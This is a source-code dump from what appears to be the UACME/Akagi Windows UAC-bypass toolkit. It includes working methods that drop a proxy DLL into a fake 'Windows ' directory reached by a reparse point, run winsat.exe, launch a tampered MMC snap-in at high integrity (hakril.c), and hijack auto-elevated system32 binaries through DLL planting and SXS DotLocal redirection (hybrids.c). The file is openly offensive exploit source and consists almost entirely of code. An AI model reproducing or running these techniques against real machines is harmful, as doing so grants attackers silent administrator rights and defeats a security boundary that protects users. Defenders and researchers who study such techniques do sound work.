_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HANDLE hFakeWindows = NULL;
UNICODE_STRING usDirectoryName;
OBJECT_ATTRIBUTES ObjectAttributes;
WCHAR szPayloadDir[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
WCHAR szDest[MAX_PATH * 2];
do {
//
// Create destination dir "system32" in %temp%
//
_strcpy(szPayloadDir, g_ctx->szTempDirectory);
_strcat(szPayloadDir, L"system32\\");
if (!CreateDirectory(szPayloadDir, NULL)) {
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
//
// Drop fubuki to %temp%\system32 as winmm.dll
//
_strcpy(szDest, szPayloadDir);
_strcat(szDest, WINMM_DLL);
if (!supWriteBufferToFile(szDest, ProxyDll, ProxyDllSize))
break;
//
// Copy winsat to %temp%\system32
//
_strcpy(szSource, g_ctx->szSystemDirectory);
_strcat(szSource, WINSAT_EXE);
_strcpy(szDest, szPayloadDir);
_strcat(szDest, WINSAT_EXE);
if (!CopyFile(szSource, szDest, FALSE))
break;
//
// Fake root.
//
RtlSecureZeroMemory(szSource, sizeof(szSource));
szSource[0] = L'\\';
szSource[1] = L'?';
szSource[2] = L'?';
szSource[3] = L'\\';
_strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);
_strcat(szSource, L"Windows ");
RtlInitUnicodeString(&usDirectoryName, szSource);
InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName,
OBJ_CASE_INSENSITIVE, NULL, NULL);
if (!NT_SUCCESS(supCreateDirectory(
&hFakeWindows,
&ObjectAttributes,
FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN)))
{
break;
}
//
// Set reparse to %temp%.
//
_strcpy(szSource, L"\\??\\");
_strcat(szSource, g_ctx->szTempDirectory);
supSetMountPoint(
hFakeWindows,
szSource,
&szSource[4]);
//
// Run target application.
//
RtlSecureZeroMemory(&szSource, sizeof(szSource));
_strncpy(szSource, 4, g_ctx->szSystemRoot, 4);
_strcat(szSource, L"Windows \\system32\\");
_strcat(szSource, WINSAT_EXE);
if (supRunProcess(szSource, NULL))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
//
// Cleanup.
//
if (hFakeWindows) {
//
// Remove reparse point.
//
supDeleteMountPoint(hFakeWindows);
NtClose(hFakeWindows);
//
// Remove directory.
//
RtlSecureZeroMemory(szSource, sizeof(szSource));
szSource[0] = L'\\';
szSource[1] = L'?';
szSource[2] = L'?';
szSource[3] = L'\\';
_strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);
_strcat(szSource, L"Windows ");
RtlInitUnicodeString(&usDirectoryName, szSource);
InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName,
OBJ_CASE_INSENSITIVE, NULL, NULL);
NtDeleteFile(&ObjectAttributes);
}
return MethodResult;
}
================================================
FILE: Source/Akagi/methods/elvint.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: ELVINT.H
*
* VERSION: 3.62
*
* DATE: 04 Jul 2022
*
* Prototypes and definitions for elevated interface methods.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef interface IColorDataProxy IColorDataProxy;
typedef interface ICMLuaUtil ICMLuaUtil;
typedef interface IFwCplLua IFwCplLua;
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef interface ISecurityEditor ISecurityEditor;
typedef interface IIEAdminBrokerObject IIEAdminBrokerObject;
typedef interface IActiveXInstallBroker IActiveXInstallBroker;
typedef interface IWscAdmin IWscAdmin;
typedef interface IElevatedFactoryServer IElevatedFactoryServer;
//VTBL DEF
typedef struct IColorDataProxyVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IColorDataProxy * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IColorDataProxy * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *LaunchDccw)(
__RPC__in IColorDataProxy * This,
_In_ HWND hwnd);
END_INTERFACE
} *PIColorDataProxyVtbl;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ICMLuaUtil * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *SetRasCredentials)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *SetRasEntryProperties)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *DeleteRasEntry)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *LaunchInfSection)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *LaunchInfSectionEx)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *CreateLayerDirectory)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow);
HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
__RPC__in ICMLuaUtil * This,
_In_ HKEY hKey,
_In_opt_ LPCTSTR lpSubKey,
_In_opt_ LPCTSTR lpValueName,
_In_ LPCTSTR lpValueString);
HRESULT(STDMETHODCALLTYPE *DeleteRegistryStringValue)(
__RPC__in ICMLuaUtil * This,
_In_ HKEY hKey,
_In_ LPCTSTR lpSubKey,
_In_ LPCTSTR lpValueName);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *DeleteRegKeysWithoutSubKeys)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *DeleteRegTree)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *ExitWindowsFunc)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *AllowAccessToTheWorld)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *CreateFileAndClose)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *DeleteHiddenCmProfileFiles)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *CallCustomActionDll)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *RunCustomActionExe)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_COM_Outptr_ LPCTSTR *pszHandleAsHexString);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *SetRasSubEntryProperties)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *DeleteRasSubEntry)(
__RPC__in ICMLuaUtil * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *SetCustomAuthData)(
__RPC__in ICMLuaUtil * This);
END_INTERFACE
} *PICMLuaUtilVtbl;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE* QueryInterface)(
__RPC__in IFwCplLua* This,
__RPC__in REFIID riid,
_COM_Outptr_ void** ppvObject);
ULONG(STDMETHODCALLTYPE* AddRef)(
__RPC__in IFwCplLua* This);
ULONG(STDMETHODCALLTYPE* Release)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* GetTypeInfoCount)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* GetTypeInfo)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* GetIDsOfNames)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* Invoke)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* AddGlobalPort)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* AddProgram)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* DeleteGlobalPort)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* DeleteApplication)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* EnablePort)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* EnableProgram)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* EnableRuleGroup)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* EnableCustomRule)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* EditGlobalPort)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* EditProgram)(
__RPC__in IFwCplLua* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* Activate)(
__RPC__in IFwCplLua* This);
HRESULT(STDMETHODCALLTYPE* LaunchAdvancedUI)(
__RPC__in IFwCplLua* This);
END_INTERFACE
} *PIFwCplLuaInterfaceVtbl;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IEditionUpgradeManager * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IEditionUpgradeManager * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *InitializeWindow)(
__RPC__in IEditionUpgradeManager * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystem)(
__RPC__in IEditionUpgradeManager * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *ShowProductKeyUI)(
__RPC__in IEditionUpgradeManager * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystemWithParams)(
__RPC__in IEditionUpgradeManager * This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseForWindows)(
__RPC__in IEditionUpgradeManager * This);
HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseWithPreviousId)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in LPWSTR PreviousId,
__RPC__in DWORD *Data);
//incomplete, irrelevant
END_INTERFACE
} *PIEditionUpgradeManagerVtbl;
typedef struct ISecurityEditorVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ISecurityEditor * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ISecurityEditor * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ISecurityEditor * This);
HRESULT(STDMETHODCALLTYPE *GetSecurity)(
__RPC__in ISecurityEditor * This,
_In_ LPCOLESTR ObjectName,
_In_ SE_OBJECT_TYPE ObjectType,
_In_ SECURITY_INFORMATION SecurityInfo,
_Out_opt_ LPCOLESTR * ppSDDLStr);
HRESULT(STDMETHODCALLTYPE *SetSecurity)(
__RPC__in ISecurityEditor * This,
_In_ LPCOLESTR ObjectName,
_In_ SE_OBJECT_TYPE ObjectType,
_In_ SECURITY_INFORMATION SecurityInfo,
_In_ LPCOLESTR ppSDDLStr);
END_INTERFACE
} *PISecurityEditorVtbl;
typedef struct IIEAdminBrokerObjectVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE* QueryInterface)(
__RPC__in IIEAdminBrokerObject* This,
__RPC__in REFIID riid,
_COM_Outptr_ void** ppvObject);
ULONG(STDMETHODCALLTYPE* AddRef)(
__RPC__in IIEAdminBrokerObject* This);
ULONG(STDMETHODCALLTYPE* Release)(
__RPC__in IIEAdminBrokerObject* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* InitializeAdminInstaller)(
__RPC__in IIEAdminBrokerObject* This,
_In_opt_ LPCOLESTR ProviderName,
_In_ DWORD Unknown0,
_COM_Outptr_ void** InstanceGuid);
END_INTERFACE
} *PIIEAdminBrokerObjectVtbl;
typedef struct IActiveXInstallBrokerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE* QueryInterface)(
__RPC__in IActiveXInstallBroker* This,
__RPC__in REFIID riid,
_COM_Outptr_ void** ppvObject);
ULONG(STDMETHODCALLTYPE* AddRef)(
__RPC__in IActiveXInstallBroker* This);
ULONG(STDMETHODCALLTYPE* Release)(
__RPC__in IActiveXInstallBroker* This);
//incomplete definition
HRESULT(STDMETHODCALLTYPE* VerifyFile)(
__RPC__in IActiveXInstallBroker* This,
_In_ BSTR InstanceGuid,
_In_ HWND ParentWindow,
_In_ BSTR Unknown0,
_In_ BSTR pcwszFilePath,
_In_ BSTR Unknown1,
_In_ ULONG dwUIChoice,
_In_ ULONG dwUIContext,
_In_ REFGUID GuidKey,
_Out_ BSTR* VerifiedFileName,
_Out_ PULONG CertDetailsSize,
_Out_ void** CertDetails);
HRESULT(STDMETHODCALLTYPE* RunSetupCommand)(
__RPC__in IActiveXInstallBroker* This,
_In_ BSTR InstanceGuid,
_In_ HWND ParentWindow,
_In_ BSTR szCmdName,
_In_ BSTR szInfSection,
_In_ BSTR szDir,
_In_ BSTR szTitle,
_In_ ULONG dwFlags,
_Out_ PHANDLE lpTargetHandle);
//incomplete definition
END_INTERFACE
} *PIActiveXInstallBrokerVtbl;
typedef struct IWscAdminVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE* QueryInterface)(
__RPC__in IWscAdmin* This,
__RPC__in REFIID riid,
_COM_Outptr_ void** ppvObject);
ULONG(STDMETHODCALLTYPE* AddRef)(
__RPC__in IWscAdmin* This);
ULONG(STDMETHODCALLTYPE* Release)(
__RPC__in IWscAdmin* This);
HRESULT(STDMETHODCALLTYPE* Initialize)(
__RPC__in IWscAdmin* This);
HRESULT(STDMETHODCALLTYPE* DoModalSecurityAction)(
__RPC__in IWscAdmin* This,
__RPC__in HWND ParentWindow,
__RPC__in UINT Action,
_Reserved_ PVOID Reserved);
END_INTERFACE
} *PIWscAdminVtbl;
typedef struct IElevatedFactoryServerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE* QueryInterface)(
__RPC__in IElevatedFactoryServer* This,
__RPC__in REFIID riid,
_COM_Outptr_ void** ppvObject);
ULONG(STDMETHODCALLTYPE* AddRef)(
__RPC__in IElevatedFactoryServer* This);
ULONG(STDMETHODCALLTYPE* Release)(
__RPC__in IElevatedFactoryServer* This);
HRESULT(STDMETHODCALLTYPE* ServerCreateElevatedObject)(
__RPC__in IElevatedFactoryServer* This,
__RPC__in REFCLSID rclsid,
__RPC__in REFIID riid,
_COM_Outptr_ void** ppvObject);
//incomplete definition
END_INTERFACE
} *PIElevatedFactoryServerVtbl;
// INTERFACE DEF
interface IColorDataProxy { CONST_VTBL struct IColorDataProxyVtbl* lpVtbl; };
interface ICMLuaUtil { CONST_VTBL struct ICMLuaUtilVtbl* lpVtbl; };
interface IFwCplLua { CONST_VTBL struct IFwCplLuaInterfaceVtbl* lpVtbl; };
interface IEditionUpgradeManager { CONST_VTBL struct IEditionUpgradeManagerVtbl* lpVtbl; };
interface ISecurityEditor { CONST_VTBL struct ISecurityEditorVtbl* lpVtbl; };
interface IIEAdminBrokerObject { CONST_VTBL struct IIEAdminBrokerObjectVtbl* lpVtbl; };
interface IActiveXInstallBroker { CONST_VTBL struct IActiveXInstallBrokerVtbl* lpVtbl; };
interface IWscAdmin { CONST_VTBL struct IWscAdminVtbl* lpVtbl; };
interface IElevatedFactoryServer { CONST_VTBL struct IElevatedFactoryServerVtbl* lpVtbl; };
================================================
FILE: Source/Akagi/methods/hakril.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2025
*
* TITLE: HAKRIL.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* UAC bypass method from Clement Rouault aka hakril.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "encresource.h"
typedef ULONG_PTR(WINAPI* pfnAipFindLaunchAdminProcess)(
LPWSTR lpApplicationName,
LPWSTR lpParameters,
DWORD UacRequestFlag,
DWORD dwCreationFlags,
LPWSTR lpCurrentDirectory,
HWND hWnd,
PVOID StartupInfo,
PVOID ProcessInfo,
ELEVATION_REASON* ElevationReason);
/*
* ucmHakrilMethod
*
* Purpose:
*
* Bypass UAC by abusing "feature" of appinfo command line parser.
* (all bugs are features/not a boundary of %something% by MS philosophy)
* Command line parser logic allows execution of custom snap-in console as if it
* "trusted" by Microsoft, resulting in your code running inside MMC.exe on High IL.
*
* Trigger: custom console snap-in with shockwave flash object resulting in
* execution of remote script on local machine with High IL.
*
*/
NTSTATUS ucmHakrilMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
ULONG DataSize = 0, SnapinSize = 0;
SIZE_T Dummy, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0;
PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;
PVOID ImageBaseAddress = g_hInstance;
CHAR *pszMarker;
WCHAR szBuffer[MAX_PATH * 2];
WCHAR szParams[MAX_PATH * 3];
CHAR szConvertedBuffer[MAX_PATH * 2];
PROCESS_INFORMATION procInfo;
do {
//
// Decrypt and decompress custom Kamikaze snap-in.
//
SnapinResource = supLdrQueryResourceData(
KAMIKAZE_ID,
ImageBaseAddress,
&DataSize);
if (SnapinResource) {
SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);
if (SnapinData == NULL)
break;
}
else
break;
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
FUBUKI_DEFAULT_ENTRYPOINT,
TRUE))
{
break;
}
//
// Write Fubuki to the %temp%
//
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szTempDirectory);
Dummy = _strlen(szBuffer);
_strcat(szBuffer, OSK_EXE);
if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))
break;
//
// Build filename for launcher.
//
szBuffer[Dummy] = 0;
_strcat(szBuffer, KAMIKAZE_LAUNCHER);
MscBufferSize = ALIGN_UP_BY(SnapinSize + sizeof(szBuffer), PAGE_SIZE);
MscBufferPtr = supVirtualAlloc(
&MscBufferSize,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE, NULL);
if (MscBufferPtr == NULL)
break;
//
// Converted filename to ANSI to be used in msc modification next.
//
RtlSecureZeroMemory(szConvertedBuffer, sizeof(szConvertedBuffer));
WideCharToMultiByte(CP_ACP, 0, szBuffer, -1, szConvertedBuffer, sizeof(szConvertedBuffer), NULL, NULL);
//
// Write launcher to the %temp%
//
if (!supDecodeAndWriteBufferToFile(szBuffer,
(CONST PVOID)g_encodedKamikazeFinal,
sizeof(g_encodedKamikazeFinal),
'kmkz'))
{
break;
}
//
// Build Kamikaze filename.
//
szBuffer[Dummy] = 0;
_strcat(szBuffer, KAMIKAZE_MSC);
//
// Reconfigure msc snapin and write it to the %temp%.
//
pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);
if (pszMarker && pszMarker >= (CHAR*)SnapinData &&
pszMarker < ((CHAR*)SnapinData + SnapinSize)) {
//
// Copy first part of snapin (unchanged).
//
MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);
MscSize = MscBytesIO;
RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);
//
// Copy modified part.
//
MscBytesIO = (ULONG)_strlen_a(szConvertedBuffer);
RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szConvertedBuffer, MscBytesIO);
MscSize += MscBytesIO;
//
// Copy all of the rest.
//
while (*pszMarker != 0 && *pszMarker != '<' &&
pszMarker < ((CHAR*)SnapinData + SnapinSize))
{
pszMarker++;
}
if (pszMarker < ((CHAR*)SnapinData + SnapinSize)) {
MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);
RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);
MscSize += MscBytesIO;
}
//
// Write result to the file.
//
if (!supWriteBufferToFile(szBuffer, MscBufferPtr, (ULONG)MscSize))
break;
supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
MscBufferPtr = NULL;
}
//
// Prepare snap-in parameters.
//
_strcpy(szParams, TEXT("lzx32,wf.msc \""));
_strcat(szParams, szBuffer);
_strcat(szParams, TEXT("\""));
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, MMC_EXE);
//
// Run trigger application.
//
RtlSecureZeroMemory(&procInfo, sizeof(procInfo));
if (AicLaunchAdminProcess(szBuffer,
szParams,
1, //elevate
CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED,
g_ctx->szSystemRoot,
T_DEFAULT_DESKTOP,
NULL,
INFINITE,
SW_HIDE,
&procInfo))
{
if (procInfo.hThread) {
ResumeThread(procInfo.hThread);
CloseHandle(procInfo.hThread);
}
if (procInfo.hProcess) {
if (WaitForSingleObject(procInfo.hProcess, 5000) == WAIT_TIMEOUT)
TerminateProcess(procInfo.hProcess, 0);
CloseHandle(procInfo.hProcess);
}
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
//
// Cleanup.
//
if (MscBufferPtr) {
supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
}
if (SnapinData) {
supSecureVirtualFree(SnapinData, SnapinSize, NULL);
}
return MethodResult;
}
/*
* ucmHakrilMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for HakrilMethod
*
*/
BOOL ucmHakrilMethodCleanup(
VOID
)
{
SIZE_T Dummy;
WCHAR szBuffer[MAX_PATH * 2];
_strcpy(szBuffer, g_ctx->szTempDirectory);
Dummy = _strlen(szBuffer);
_strcat(szBuffer, KAMIKAZE_MSC);
DeleteFile(szBuffer);
Sleep(1000);
szBuffer[Dummy] = 0;
_strcat(szBuffer, KAMIKAZE_LAUNCHER);
DeleteFile(szBuffer);
szBuffer[Dummy] = 0;
_strcat(szBuffer, OSK_EXE);
return DeleteFile(szBuffer);
}
================================================
FILE: Source/Akagi/methods/hybrids.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2025
*
* TITLE: HYBRIDS.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* Hybrid UAC bypass methods.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"
#include "encresource.h"
/*
* ucmMethodCleanupSingleFileSystem32
*
* Purpose:
*
* Post execution cleanup routine.
*
*/
BOOL ucmMethodCleanupSingleItemSystem32(
_In_ LPCWSTR lpItemName,
_In_opt_ LPCWSTR lpSubDirectory
)
{
LPWSTR lpDestination;
SIZE_T cb;
BOOL bResult = FALSE;
cb = 1 + sizeof(g_ctx->szSystemDirectory);
cb += _strlen(lpItemName);
if (lpSubDirectory) cb += _strlen(lpSubDirectory);
cb *= sizeof(WCHAR);
lpDestination = (LPWSTR)supHeapAlloc(cb);
if (lpDestination) {
_strcpy(lpDestination, g_ctx->szSystemDirectory);
if (lpSubDirectory)
_strcat(lpDestination, lpSubDirectory);
_strcat(lpDestination, lpItemName);
bResult = ucmMasqueradedDeleteDirectoryFileCOM(lpDestination);
supHeapFree(lpDestination);
}
return bResult;
}
/*
* ucmxGenericAutoelevationEx
*
* Purpose:
*
* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll
*
*/
NTSTATUS ucmGenericAutoelevationEx(
_In_opt_ LPCWSTR lpTargetApp,
_In_ LPCWSTR lpTargetDll,
_In_opt_ LPCWSTR lpParameters,
_In_opt_ LPCWSTR lpSubDirectory,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
SIZE_T cb, nLen;
LPWSTR lpSource, lpDestination;
//
// Allocate source path.
//
cb = (MAX_PATH * 2) +
sizeof(g_ctx->szTempDirectory) +
(_strlen(lpTargetDll) * sizeof(WCHAR));
lpSource = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));
if (lpSource == NULL)
return STATUS_MEMORY_NOT_ALLOCATED;
//
// Allocate destination path.
//
cb = sizeof(g_ctx->szSystemDirectory);
if (lpSubDirectory)
cb += (_strlen(lpSubDirectory) * sizeof(WCHAR));
cb += (_strlen(lpTargetDll) * sizeof(WCHAR));
lpDestination = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));
if (lpDestination == NULL) {
supHeapFree(lpSource);
return STATUS_MEMORY_NOT_ALLOCATED;
}
//put target dll
_strcpy(lpSource, g_ctx->szTempDirectory);
_strcat(lpSource, lpTargetDll);
nLen = _strlen(lpSource);
lpSource[nLen - 1] = UCM_TRASH_END_CHAR;
//write proxy dll to disk
if (supWriteBufferToFile(lpSource, ProxyDll, ProxyDllSize)) {
//target dir
_strcpy(lpDestination, g_ctx->szSystemDirectory);
if (lpSubDirectory)
_strcat(lpDestination, lpSubDirectory);
//drop payload to system32
if (ucmMasqueradedMoveFileCOM(lpSource, lpDestination)) {
_strcpy(lpSource, lpDestination);
_strcat(lpSource, lpTargetDll);
nLen = _strlen(lpSource);
lpSource[nLen - 1] = UCM_TRASH_END_CHAR;
if (ucmMasqueradedRenameElementCOM(lpSource, lpTargetDll)) {
//run target app
if (lpTargetApp) {
if (supRunProcess2(lpTargetApp,
lpParameters,
NULL,
SW_HIDE,
SUPRUNPROCESS_TIMEOUT_DEFAULT))
{
Sleep(5000);
MethodResult = STATUS_SUCCESS;
}
}
else {
MethodResult = STATUS_SUCCESS;
}
}
}
}
supHeapFree(lpSource);
supHeapFree(lpDestination);
return MethodResult;
}
/*
* ucmGenericAutoelevation
*
* Purpose:
*
* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll
*
*/
NTSTATUS ucmGenericAutoelevation(
_In_opt_ LPCWSTR lpTargetApp,
_In_ LPCWSTR lpTargetDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
return ucmGenericAutoelevationEx(lpTargetApp,
lpTargetDll,
NULL,
NULL,
ProxyDll,
ProxyDllSize);
}
/*
* ucmSXSMethod
*
* Purpose:
*
* Exploit SXS Local Redirect feature.
*
* SXS/Fusion uses dll redirection, attempting to load internal manifest dependencies from
* non existent directory (this is so called DotLocal dll redirection), it is trying to do this
* before going to WinSXS store.
*
* In this case dependency is Microsoft.Windows.Common-Controls.
*
* Maybe you think it is handy cool feature, but I think its another backdoor from lazy dotnet crew.
* "You keep shipping crap, and crap, and more crap".
*
*/
NTSTATUS ucmSXSMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize,
_In_opt_ LPWSTR lpTargetDirectory, //single element in system32 with slash at end
_In_ LPWSTR lpTargetApplication, //executable name
_In_opt_ LPWSTR lpLaunchApplication, //executable name, must be in same dir as lpTargetApplication
_In_ BOOL bConsentItself
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
